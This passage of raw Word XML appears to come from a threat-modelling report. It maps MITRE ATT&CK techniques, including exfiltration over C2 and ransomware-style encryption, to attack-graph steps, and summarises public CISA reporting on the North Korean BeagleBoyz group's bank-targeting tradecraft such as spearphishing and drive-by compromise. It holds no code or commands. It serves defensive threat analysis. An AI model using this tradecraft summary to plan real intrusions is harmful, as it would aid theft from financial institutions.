                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration Over C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BA08CDF" w14:textId="3B74DAFA" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="002F2A0D" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="648" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2948FCF6" w14:textId="77777777" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="701D3AD0" w14:textId="0D017553" w:rsidR="007E7137" w:rsidRDefault="002F2A0D" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C662869" w14:textId="56BCEDC3" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="0018768B" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>AO-EXF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66291EE1" w14:textId="459C4807" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="002F2A0D" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[4] </w:t>
            </w:r>
            <w:r w:rsidRPr="002F2A0D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Mitre Attack Tactics and Techniques</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> describing </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Nukesped</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> capabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E7137" w:rsidRPr="00646EAA" w14:paraId="12FEF76C" w14:textId="77777777" w:rsidTr="00AE7934">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D911A6B" w14:textId="5565C0B2" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="00782481" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1882" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22AF73F5" w14:textId="03A4111E" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="00782481" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0040 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="400045DC" w14:textId="412F7E61" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="00782481" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1486 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Data Encrypted for Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6584EA2D" w14:textId="41F1195F" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="00782481" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="648" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3718B7B6" w14:textId="77777777" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A4C8228" w14:textId="59673B89" w:rsidR="007E7137" w:rsidRDefault="00782481" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="742A057B" w14:textId="34C06685" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="0018768B" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>AO-TMA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B212E6E" w14:textId="76B4B0B5" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="00782481" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00782481">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Encrypt data on target systems and withhold access to the decryption key until a ransom is paid, or render data permanently inaccessible if the ransom is not paid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="87"/>
      <w:tr w:rsidR="007E7137" w:rsidRPr="00646EAA" w14:paraId="4AAE8E76" w14:textId="77777777" w:rsidTr="00AE7934">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A66AC52" w14:textId="77777777" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1882" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FEDA792" w14:textId="77777777" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B426774" w14:textId="77777777" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D8797B2" w14:textId="77777777" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="648" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65D3573C" w14:textId="77777777" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77C69540" w14:textId="77777777" w:rsidR="007E7137" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1858AD24" w14:textId="77777777" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CF6FF58" w14:textId="77777777" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E7DBF" w:rsidRPr="00646EAA" w14:paraId="2EDFF084" w14:textId="77777777" w:rsidTr="009E7DBF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C9232F6" w14:textId="77777777" w:rsidR="009E7DBF" w:rsidRPr="00646EAA" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1882" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FB9C722" w14:textId="77777777" w:rsidR="009E7DBF" w:rsidRPr="00646EAA" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05192CEF" w14:textId="77777777" w:rsidR="009E7DBF" w:rsidRPr="00646EAA" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31DD8E8A" w14:textId="77777777" w:rsidR="009E7DBF" w:rsidRPr="00646EAA" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="648" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BB20313" w14:textId="77777777" w:rsidR="009E7DBF" w:rsidRPr="00646EAA" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="172CB98F" w14:textId="77777777" w:rsidR="009E7DBF" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29D76BA2" w14:textId="77777777" w:rsidR="009E7DBF" w:rsidRPr="00646EAA" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4848E0AC" w14:textId="77777777" w:rsidR="009E7DBF" w:rsidRPr="00646EAA" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="262A1AA2" w14:textId="77777777" w:rsidR="0042549C" w:rsidRPr="0077286F" w:rsidRDefault="0042549C" w:rsidP="0042549C"/>
    <w:p w14:paraId="384C8A00" w14:textId="77777777" w:rsidR="0042549C" w:rsidRPr="00C94979" w:rsidRDefault="0042549C" w:rsidP="0042549C"/>
    <w:p w14:paraId="6B56F0F9" w14:textId="77777777" w:rsidR="0042549C" w:rsidRDefault="0042549C" w:rsidP="0042549C">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2BFE43F5" w14:textId="3594697F" w:rsidR="00BD6C52" w:rsidRDefault="006F0B76" w:rsidP="0042549C">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId105" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00BD6C52">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>FASTCash</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00BD6C52">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> 2.0: North Korea's </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00BD6C52">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>BeagleBoyz</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00BD6C52">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> Robbing Banks | CISA</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="335E3695" w14:textId="0A8DD5D7" w:rsidR="00236403" w:rsidRDefault="00236403" w:rsidP="0042549C">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Also using </w:t>
      </w:r>
      <w:r w:rsidR="006F0B76">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:hyperlink r:id="rId106" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Attack Graph Response to US-CERT AA22-108A: North Korean Targeting of Blockchain Companies - </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>AttackIQ</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A43BB5">
        <w:t>to select an example attack graph</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E515160" w14:textId="6F2208A5" w:rsidR="00FB7B72" w:rsidRDefault="00FB7B72" w:rsidP="0042549C">
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId107" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>MAR-10288834-</w:t>
        </w:r>
        <w:proofErr w:type="gramStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>1.v</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>1 – North Korean Remote Access Tool: COPPERHEDGE | CISA</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="07B29CC1" w14:textId="5B806CB8" w:rsidR="00FB7B72" w:rsidRPr="00236403" w:rsidRDefault="00FB7B72" w:rsidP="0042549C">
      <w:r>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:hyperlink r:id="rId108" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>NukeSped</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> RAT Report - CYFIRMA</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7B73F766" w14:textId="0741EDDB" w:rsidR="00AE350A" w:rsidRDefault="00AE350A" w:rsidP="0042549C">
      <w:r w:rsidRPr="00AE350A">
        <w:t>North Korea's intelligence apparatus controls a hacking team dedicated to robbing banks through remote internet access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3D11E3" w14:textId="7FCB0164" w:rsidR="00AE350A" w:rsidRDefault="00AE350A" w:rsidP="0042549C">
      <w:r>
        <w:t>Potentially subgroup of Lazarus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0162C0" w14:textId="479ED35A" w:rsidR="00AE350A" w:rsidRDefault="00AE350A" w:rsidP="0042549C">
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE350A">
        <w:t xml:space="preserve">esponsible for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE350A">
        <w:t>FASTCash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE350A">
        <w:t xml:space="preserve"> ATM cash outs reported in October 2018, fraudulent abuse of compromised bank-operated SWIFT system endpoints since at least 2015, and lucrative cryptocurrency thefts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331EF9A4" w14:textId="03CC013F" w:rsidR="00AE350A" w:rsidRDefault="002E1295" w:rsidP="0042549C">
      <w:r w:rsidRPr="002E1295">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E1295">
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E1295">
        <w:t xml:space="preserve"> likely have targeted financial institutions in the following nations from 2015 through 2020: Argentina, Brazil, Bangladesh, Bosnia and Herzegovina, Bulgaria, Chile, Costa Rica, Ecuador, Ghana, India, Indonesia, </w:t>
      </w:r>
      <w:r w:rsidRPr="002E1295">
        <w:lastRenderedPageBreak/>
        <w:t>Japan, Jordan, Kenya, Kuwait, Malaysia, Malta, Mexico, Mozambique, Nepal, Nicaragua, Nigeria, Pakistan, Panama, Peru, Philippines, Singapore, South Africa, South Korea, Spain, Taiwan, Tanzania, Togo, Turkey, Uganda, Uruguay, Vietnam, Zambia</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44587932" w14:textId="62984FF7" w:rsidR="002E1295" w:rsidRDefault="002E1295" w:rsidP="0042549C"/>
    <w:p w14:paraId="7AB2FCF9" w14:textId="5F54FEFC" w:rsidR="001D029F" w:rsidRDefault="001D029F" w:rsidP="0042549C">
      <w:r w:rsidRPr="001D029F">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D029F">
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D029F">
        <w:t xml:space="preserve"> have used a variety of techniques, such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D029F">
        <w:t>spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D029F">
        <w:t xml:space="preserve"> and watering holes, to enable initial access into targeted financial institutions. Towards the end of 2018 through 2019 and in early 2020, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D029F">
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D029F">
        <w:t xml:space="preserve"> demonstrated the use of social engineering tactics by carrying out job-application themed phishing attacks using the following publicly available malicious files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC6EB07" w14:textId="57507319" w:rsidR="001D029F" w:rsidRDefault="001D029F" w:rsidP="0042549C">
      <w:r w:rsidRPr="001D029F">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D029F">
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D029F">
        <w:t xml:space="preserve"> may also be working with or contracting out to criminal hacking groups, like TA505, for initial access development</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E68134A" w14:textId="77777777" w:rsidR="001D029F" w:rsidRDefault="001D029F" w:rsidP="001D029F">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> have also used the following techniques to gain an initial foothold on a targeted computer network (Initial Access [TA0001]).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B8F5C4" w14:textId="77777777" w:rsidR="001D029F" w:rsidRDefault="001D029F" w:rsidP="001D029F"/>
    <w:p w14:paraId="47B95205" w14:textId="500783A4" w:rsidR="001D029F" w:rsidRDefault="001D029F" w:rsidP="001D029F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Email an attachment with malware to a specific individual, company, or industry (Phishing: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Attachment [</w:t>
      </w:r>
      <w:r w:rsidRPr="006F0B76">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1566.001</w:t>
      </w:r>
      <w:r>
        <w:t>])</w:t>
      </w:r>
      <w:r w:rsidR="006F0B76">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="006F0B76" w:rsidRPr="006F0B76">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1204.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006F0B76" w:rsidRPr="006F0B76">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8C605C" w14:textId="77777777" w:rsidR="001D029F" w:rsidRDefault="001D029F" w:rsidP="001D029F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Compromise a website visited by users in specific communities, industries, or regions (Drive-by Compromise [T1189])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43597B65" w14:textId="77777777" w:rsidR="001D029F" w:rsidRDefault="001D029F" w:rsidP="001D029F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Exploit a weakness (a bug, glitch, or design vulnerability) in an internet-facing computer system (such as a database or web server) (Exploit Public Facing Application [T1190])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADFA097" w14:textId="77777777" w:rsidR="001D029F" w:rsidRDefault="001D029F" w:rsidP="001D029F">
      <w:pPr>
